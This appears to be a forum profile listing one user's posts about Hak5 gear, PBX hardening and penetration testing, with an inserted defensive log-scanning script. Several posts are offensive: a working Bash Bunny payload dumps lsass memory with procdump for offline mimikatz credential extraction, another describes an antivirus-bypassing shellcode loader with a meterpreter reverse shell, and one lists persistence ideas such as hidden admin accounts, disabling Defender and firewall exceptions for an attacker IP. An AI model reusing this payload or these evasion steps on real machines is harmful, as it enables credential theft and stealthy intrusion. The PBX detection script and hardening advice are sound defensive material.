rottingsun
Active Members (Posts: 95, Days Won: 2)

Everything posted by rottingsun

  1. There are a few basic strategies, some hardware based and some software based. Normally a special type of firewall called a session border controller is placed in front of the PBX. They're designed to address issues like toll fraud. Other things can be done too though. General PBX hardening best practices should be enforced, like strong SIP account passwords, limiting SIP sessions to only your authorized private subnets, not allowing outgoing international calling, not allowing outgoing calling to offshore US territories, turning off call transfer feature codes for incoming calls, not exposing your PBX directly to a public IP, etc. On top of that, you must monitor logs regularly. Here's a presentation that's FreePBX based but includes general best practices. https://player.vimeo.com/video/130328541
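As an added illustration of the "monitor logs regularly" point in the post above (this is example code written for this page, not rottingsun's and not from FreePBX), the script below runs three of the listed controls as detections over constructed Asterisk-style log lines: registrations from outside the authorized private subnets, bursts of failed SIP registrations from one source, and outbound dial attempts with an international prefix. The log format approximates what Asterisk's chan_sip writes; the subnets, threshold, window and sample lines are all assumptions for the example.

```python
"""Flag suspicious SIP activity in PBX logs.

Added example for this page, not code from the original post or from FreePBX.
Assumptions: log lines shaped like Asterisk "full" log output (constructed
below), and illustrative policy values that a site would tune.
"""
import ipaddress
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Hypothetical policy: only these subnets may register, a small burst of
# failures from one IP within the window is treated as a guessing attempt,
# and any number dialed with an international prefix is flagged.
AUTHORIZED_SUBNETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16")]
FAILED_REG_THRESHOLD = 3
WINDOW = timedelta(minutes=5)
INTL_PREFIXES = ("011", "+")   # NANP international access code / E.164 plus

# Approximation of chan_sip's "Registration from ... failed for ..." notice.
REG_FAIL = re.compile(
    r"^\[(?P<ts>[^\]]+)\] NOTICE\[\d+\] chan_sip\.c: Registration from '[^']*' "
    r"failed for '(?P<ip>[\d.]+):\d+' - (?P<reason>.+)$"
)
# Approximation of the dialplan trace for an outbound Dial() from internal phones.
OUTBOUND = re.compile(
    r"^\[(?P<ts>[^\]]+)\] VERBOSE\[\d+\].*Executing \[(?P<dialed>[+\d]+)@from-internal:\d+\] Dial\("
)

# Constructed sample log (not real traffic): a public IP trying three accounts,
# one internal typo, one international call and one domestic call.
SAMPLE_LOG = """\
[2024-03-01 09:00:01] NOTICE[2231] chan_sip.c: Registration from '"1001" <sip:1001@198.51.100.10>' failed for '203.0.113.7:5060' - Wrong password
[2024-03-01 09:00:02] NOTICE[2231] chan_sip.c: Registration from '"1002" <sip:1002@198.51.100.10>' failed for '203.0.113.7:5060' - Wrong password
[2024-03-01 09:00:03] NOTICE[2231] chan_sip.c: Registration from '"1003" <sip:1003@198.51.100.10>' failed for '203.0.113.7:5060' - No matching peer found
[2024-03-01 09:01:00] NOTICE[2231] chan_sip.c: Registration from '"1001" <sip:1001@10.0.0.5>' failed for '10.0.0.44:5060' - Wrong password
[2024-03-01 09:05:00] VERBOSE[2240][C-0000001a] pbx.c:     -- Executing [01144207946000@from-internal:1] Dial("SIP/1001-00000001", "SIP/trunk/01144207946000,60") in new stack
[2024-03-01 09:06:00] VERBOSE[2240][C-0000001b] pbx.c:     -- Executing [5551234567@from-internal:1] Dial("SIP/1002-00000002", "SIP/trunk/5551234567,60") in new stack
"""


def parse_ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


def analyze(log_text):
    """Return a list of (alert_type, subject, detail) tuples in log order."""
    alerts = []
    failures = defaultdict(deque)   # source IP -> timestamps of recent failures
    reported_external = set()
    reported_bruteforce = set()
    for line in log_text.splitlines():
        m = REG_FAIL.match(line)
        if m:
            ts, ip = parse_ts(m["ts"]), ipaddress.ip_address(m["ip"])
            # Control 1: registrations should only come from authorized subnets.
            if not any(ip in net for net in AUTHORIZED_SUBNETS) and ip not in reported_external:
                reported_external.add(ip)
                alerts.append(("unauthorized_source", str(ip), m["reason"]))
            # Control 2: sliding-window count of failures per source.
            window = failures[ip]
            window.append(ts)
            while window and ts - window[0] > WINDOW:
                window.popleft()
            if len(window) >= FAILED_REG_THRESHOLD and ip not in reported_bruteforce:
                reported_bruteforce.add(ip)
                minutes = int(WINDOW.total_seconds() // 60)
                alerts.append(("registration_bruteforce", str(ip), f"{len(window)} failures in {minutes} min"))
            continue
        m = OUTBOUND.match(line)
        # Control 3: international dialing is supposed to be disabled; any attempt is notable.
        if m and m["dialed"].startswith(INTL_PREFIXES):
            alerts.append(("international_dial", m["dialed"], m["ts"]))
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

The sliding window keeps only timestamps inside WINDOW per source, so a slow trickle of failures does not accumulate forever, and each source is reported once per condition to keep the alert list readable. In practice the same logic would be pointed at the live log file and the alerts forwarded to whatever the site already uses for paging.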
  2. With mimikatz and all the derivatives being flagged more and more these days, I find it more effective to take a memdump of lsass using procdump, then run it through mimi in minidump mode.
  3. Here's my working code for running an executable (procdump) from the bunny within powershell and saving the dump file to the bunny, given the user has local admin privs to begin with. Note that in the line that runs procdump, the & character occurs at the front of the command. It is a special powershell operator that evaluates the text following the & character as a command and not a powershell object.

     LED Y 100
     source bunny_helpers.sh
     LED B 100
     ATTACKMODE HID STORAGE
     Q GUI r
     Q DELAY 500
     Q STRING powershell Start-Process powershell -Verb runAs
     Q ENTER
     Q DELAY 1000
     Q ALT y
     Q DELAY 500
     Q STRING \$bunny\=\(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
     Q DELAY 500
     Q ENTER
     Q DELAY 500
     Q STRING \& \$bunny\\payloads\\$SWITCH_POSITION\\Procdump\\procdump.exe -accepteula -ma lsass.exe \$bunny\\loot\\takeadump\\lsd.dmp
     Q ENTER
     Q DELAY 200
     Q STRING \$driveEject\=New-Object -comObject Shell.Application
     Q ENTER
     Q DELAY 200
     Q STRING \$driveEject.Namespace\(17\).ParseName\(\$bunny\).InvokeVerb\(\"Eject\"\)
     Q ENTER
     Q DELAY 200
     Q STRING exit
     Q ENTER
     LED FINISH
  4. A technique I've been experimenting with that gets past both Win Defender and Vipre AV currently is a custom shellcode loader, as per http://www.attactics.org/2016/03/bypassing-antivirus-with-10-lines-of.html. I've used the loader almost verbatim with a shikata_ga_nai meterpreter rev_tcp payload to successfully bypass both.
  5. The latest Empire stagers actually have a bunny target.
  6. Very nice. I actually never thought of the bunny/ducky in the context of legitimate uses. I got a bunny personally so I can demo to management what happens if I grant a non-IT user local admin perms like I sometimes get asked.
  7. I believe RDP locks the session of the currently logged in user, which would be a dead giveaway. Would this payload be more in the context of a sneak attack while a user is away? Not knocking it - just wondering the intent.
  8. KeePass is really awesome. Just make sure an attacker using Empire doesn't get a shell on your system. It includes a module called KeeThief which can display your master password in cleartext.
  9. I ordered a bunny late last night. Looking forward to trying out this payload and maybe adding in the concepts I mentioned.
  10. I would but I don't wanna be hungover for work tomorrow.
  11. Right, but this payload actually does assume that the machine being attacked is already logged in with admin rights as per the description - #OS: Windows (Requires Powershell and Admin Rights) This would be a great payload for the case of a target running say Windows 10 Home as the default user that also happens to be part of the Local Admins group. It's safe to assume that probably a lot of home users run Windows like that. On the other hand, this payload should NEVER work in a corporate/AD environment if even the most basic security practices are being followed. I am sure we'd all be shocked though at the number of AD setups where every user is a local admin, and god forbid, a domain admin.
  12. Anything can be done with a little ingenuity and local admin privs, which this payload does assume that the logged in user has. I have several ideas that could enhance this already good payload, including:
      - The one I previously posted about. That is, making the new user invisible to the Windows logon screen.
      - Creating an elevated scheduled task (Run with Highest Privileges option) with the new user creds. The task executes a meterpreter payload to connect back to the attacking machine after 1 minute, 5 minutes, whatever. The meterpreter session created from the scheduled task returns with UAC already bypassed, allowing for a simple getsystem command to elevate within meterpreter. EDIT: Actually it looks like meterpreter shell already does this the way it's implemented here.
      - Using Set-MpPreference to disable Windows Defender, although this is a bit "noisy" since it displays a tray popup. An alternative would be to use Set-MpPreference to set a folder exception for Windows Defender before copying any binaries that might otherwise be flagged from the bunny to the exception folder.
      - Use powershell to add a Windows Firewall exception to allow all incoming traffic from your attacking IP.
      The possibilities are endless. I guess I just need to break down and order a bunny.
  13. Very nice payload. It'd be sweet to go even a step further and hide the new user from the Windows login screen with reg commands, as per the technique outlined in this post: http://www.windowscentral.com/how-hide-specific-user-accounts-sign-screen-windows-10
  14. Here is what I always used for enumerating the duck by the label DUCKY:

      for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duckydrive=%d

      Then the ducky can actually be referenced by letter with the env var %duckydrive%.
  15. This. If your company can afford one, you will be blown away vs all others.
  16. Yes you can, but depending on the systems, it can be somewhat of a major pain in the ass to get it working just right.
  17. Actually interested to see if Hak5 has any thoughts on the situation (good, bad, or indifferent)? Seems like the entire deal was a bit bizarre.
  18. It was my understanding that pineap did work in that manner - that is, broadcast out SSIDs based on client probes. I could easily have gotten that wrong though. The audio on the talk was pretty bad. We may just have to wait for a tech doc or a follow up hangout.
  19. No, I get that - it just seems like the way he's going about it is totally ego driven.
  20. What's this guy's deal? Just to try to embarrass Darren and Seb?
  21. I always travel with only 2 bags, both of which I usually carry onto the plane (I don't like checking because of chances for lost luggage or theft). One is a small brown leather bag containing all of my clothes, and the other is my laptop backpack. That's the main reason I was asking the question really - if the overlords at the x-ray machine will make a fuss over a pineapple.
  22. Have you ever dealt with a TSA employee on a power trip?
  23. What is the budget we're talking here? Would you consider using your own server and putting the software on it yourself, or are you looking more for something like a turn key appliance?
  24. Anyone have any experience with carrying a MK5 through TSA? Are they trained to identify and confiscate them now, or can I get away with saying that the plain black device with 2 antennas is my "mobile router"?
  25. Just for some additional background, Palo Alto Networks is a firewall company started by Nir Zuk. It's up for debate who was the very first to come up with the tech, but Nir Zuk is widely reputed to be the guy who invented stateful packet inspection while working for Check Point Software. Stateful inspection is the tech that most all modern enterprise firewalls are based on. It's a huge compliment (in my humble opinion, at least) that a company like PAN mentioned the Pineapple by name.